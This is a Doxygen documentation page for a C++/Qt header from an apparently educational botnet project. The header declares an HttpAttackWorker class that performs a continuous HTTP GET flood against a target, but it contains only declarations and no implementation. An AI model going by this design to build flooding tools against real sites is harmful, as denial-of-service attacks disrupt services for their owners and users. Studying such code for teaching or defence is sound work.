<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.13"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Educational Botnet - Malware: C:/Users/james/Desktop/Dev/Github/eductional-botnet/src/bot/Malware/SharedKernel/Workers/httpattackworker.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtreedata.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
  $(document).ready(initResizable);
</script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">Educational Botnet - Malware
   </div>
   <div id="projectbrief">The client application that runs the malware.</div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.13 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
</script>
<div id="main-nav"></div>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
  <div id="nav-tree">
    <div id="nav-tree-contents">
      <div id="nav-sync" class="sync"></div>
    </div>
  </div>
  <div id="splitbar" style="-moz-user-select:none;" 
       class="ui-resizable-handle">
  </div>
</div>
<script type="text/javascript">
$(document).ready(function(){initNavTree('httpattackworker_8h_source.html','');});
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div class="header">
  <div class="headertitle">
<div class="title">httpattackworker.h</div>  </div>
</div><!--header-->
<div class="contents">
<div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="preprocessor">#ifndef HTTPATTACKWORKER_H</span></div><div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="preprocessor">#define HTTPATTACKWORKER_H</span></div><div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;</div><div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160;<span class="preprocessor">#include &lt;memory&gt;</span></div><div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;</div><div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#include &lt;QByteArray&gt;</span></div><div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160;<span class="preprocessor">#include &lt;QHostAddress&gt;</span></div><div class="line"><a name="l00008"></a><span class="lineno">    8</span>&#160;<span class="preprocessor">#include &lt;QTcpSocket&gt;</span></div><div class="line"><a name="l00009"></a><span class="lineno">    9</span>&#160;</div><div class="line"><a name="l00010"></a><span class="lineno">   10</span>&#160;<span class="preprocessor">#include &quot;attackworkerbase.h&quot;</span></div><div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160;</div><div class="line"><a name="l00012"></a><span class="lineno">   12</span>&#160;<span class="keyword">namespace </span><a class="code" href="namespaceworkers.html">workers</a></div><div class="line"><a name="l00013"></a><span class="lineno">   13</span>&#160;{</div><div class="line"><a name="l00019"></a><span class="lineno"><a class="line" href="classworkers_1_1_http_attack_worker.html">   19</a></span>&#160;    <span class="keyword">class </span><a class="code" href="classworkers_1_1_http_attack_worker.html">HttpAttackWorker</a> : <span class="keyword">public</span> <a class="code" href="classworkers_1_1_attack_worker_base.html">AttackWorkerBase</a></div><div class="line"><a name="l00020"></a><span class="lineno">   20</span>&#160;    {</div><div class="line"><a name="l00021"></a><span class="lineno">   21</span>&#160;        Q_OBJECT</div><div class="line"><a name="l00022"></a><span class="lineno">   22</span>&#160;</div><div class="line"><a name="l00023"></a><span class="lineno">   23</span>&#160;    <span class="keyword">public</span>:</div><div class="line"><a name="l00028"></a><span class="lineno">   28</span>&#160;        <a class="code" href="classworkers_1_1_http_attack_worker.html#a4e43d7fa1f3be96c348a81d237852e45">HttpAttackWorker</a>(QUrl host);</div><div class="line"><a name="l00029"></a><span class="lineno">   29</span>&#160;</div><div class="line"><a name="l00034"></a><span class="lineno">   34</span>&#160;        <span class="keywordtype">void</span> <a class="code" href="classworkers_1_1_http_attack_worker.html#af8db857753fba2be9c3e75fc8fc49912">setSingleShot</a>(<span class="keywordtype">bool</span> singleShot);</div><div class="line"><a name="l00035"></a><span class="lineno">   35</span>&#160;</div><div class="line"><a name="l00036"></a><span class="lineno">   36</span>&#160;    <span class="keyword">private</span>:</div><div class="line"><a name="l00037"></a><span class="lineno">   37</span>&#160;        <span class="keywordtype">void</span> generateHttpHeader();</div><div class="line"><a name="l00038"></a><span class="lineno">   38</span>&#160;        <span class="keywordtype">bool</span> initializeConnection();</div><div class="line"><a name="l00039"></a><span class="lineno">   39</span>&#160;        <span class="keywordtype">bool</span> isInterruptionRequested();</div><div class="line"><a name="l00040"></a><span class="lineno">   40</span>&#160;        <span class="keywordtype">void</span> sendPayload();</div><div class="line"><a name="l00041"></a><span class="lineno">   41</span>&#160;        <span class="keywordtype">bool</span> tryObtainIp();</div><div class="line"><a name="l00042"></a><span class="lineno">   42</span>&#160;</div><div class="line"><a name="l00043"></a><span class="lineno">   43</span>&#160;        QByteArray httpHeaderAsByteArray_;</div><div class="line"><a name="l00044"></a><span class="lineno">   44</span>&#160;        QString ip_;</div><div class="line"><a name="l00045"></a><span class="lineno">   45</span>&#160;        <span class="keywordtype">bool</span> isSingleShot_;</div><div class="line"><a name="l00046"></a><span class="lineno">   46</span>&#160;        std::unique_ptr&lt;QTcpSocket&gt; socket_;</div><div class="line"><a name="l00047"></a><span class="lineno">   47</span>&#160;</div><div class="line"><a name="l00048"></a><span class="lineno">   48</span>&#160;    <span class="keyword">public</span> slots:</div><div class="line"><a name="l00052"></a><span class="lineno">   52</span>&#160;        <span class="keywordtype">void</span> <a class="code" href="classworkers_1_1_http_attack_worker.html#a5799850eb227beb50ca73f7b15505c48">doWork</a>() <span class="keyword">override</span>;</div><div class="line"><a name="l00053"></a><span class="lineno">   53</span>&#160;    };</div><div class="line"><a name="l00054"></a><span class="lineno">   54</span>&#160;}</div><div class="line"><a name="l00055"></a><span class="lineno">   55</span>&#160;</div><div class="line"><a name="l00056"></a><span class="lineno">   56</span>&#160;<span class="preprocessor">#endif // HTTPATTACKWORKER_H</span></div><div class="ttc" id="classworkers_1_1_http_attack_worker_html_a4e43d7fa1f3be96c348a81d237852e45"><div class="ttname"><a href="classworkers_1_1_http_attack_worker.html#a4e43d7fa1f3be96c348a81d237852e45">workers::HttpAttackWorker::HttpAttackWorker</a></div><div class="ttdeci">HttpAttackWorker(QUrl host)</div><div class="ttdoc">Creates a new instance of the class HttpAttackWorker. </div><div class="ttdef"><b>Definition:</b> httpattackworker.cpp:9</div></div>
<div class="ttc" id="classworkers_1_1_http_attack_worker_html_af8db857753fba2be9c3e75fc8fc49912"><div class="ttname"><a href="classworkers_1_1_http_attack_worker.html#af8db857753fba2be9c3e75fc8fc49912">workers::HttpAttackWorker::setSingleShot</a></div><div class="ttdeci">void setSingleShot(bool singleShot)</div><div class="ttdoc">Sets a boolean indicating whether the attack must send a single request. </div><div class="ttdef"><b>Definition:</b> httpattackworker.cpp:28</div></div>
<div class="ttc" id="namespaceworkers_html"><div class="ttname"><a href="namespaceworkers.html">workers</a></div><div class="ttdef"><b>Definition:</b> attackworkerbase.cpp:3</div></div>
<div class="ttc" id="classworkers_1_1_http_attack_worker_html"><div class="ttname"><a href="classworkers_1_1_http_attack_worker.html">workers::HttpAttackWorker</a></div><div class="ttdoc">An implementation of attack using the method HTTP Flood (GET). </div><div class="ttdef"><b>Definition:</b> httpattackworker.h:19</div></div>
<div class="ttc" id="classworkers_1_1_http_attack_worker_html_a5799850eb227beb50ca73f7b15505c48"><div class="ttname"><a href="classworkers_1_1_http_attack_worker.html#a5799850eb227beb50ca73f7b15505c48">workers::HttpAttackWorker::doWork</a></div><div class="ttdeci">void doWork() override</div><div class="ttdoc">Attacks the target continuously. </div><div class="ttdef"><b>Definition:</b> httpattackworker.cpp:17</div></div>
<div class="ttc" id="classworkers_1_1_attack_worker_base_html"><div class="ttname"><a href="classworkers_1_1_attack_worker_base.html">workers::AttackWorkerBase</a></div><div class="ttdoc">A contract that defines an attack to be performed against a target. </div><div class="ttdef"><b>Definition:</b> attackworkerbase.h:12</div></div>
</div><!-- fragment --></div><!-- contents -->
</div><!-- doc-content -->
<!-- start footer part -->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
  <ul>
    <li class="navelem"><a class="el" href="dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li><li class="navelem"><a class="el" href="dir_29d667bb07f05bb7400afdc76794b290.html">bot</a></li><li class="navelem"><a class="el" href="dir_5f03ef8c3e132976bb5c0fed65d67894.html">Malware</a></li><li class="navelem"><a class="el" href="dir_e1df2a116952d1b3724a34cefd121e68.html">SharedKernel</a></li><li class="navelem"><a class="el" href="dir_9bd6098b5a528b39c8ce9bedda8f905c.html">Workers</a></li><li class="navelem"><b>httpattackworker.h</b></li>
    <li class="footer">Generated by
    <a href="http://www.doxygen.org/index.html">
    <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.13 </li>
  </ul>
</div>
</body>
</html>
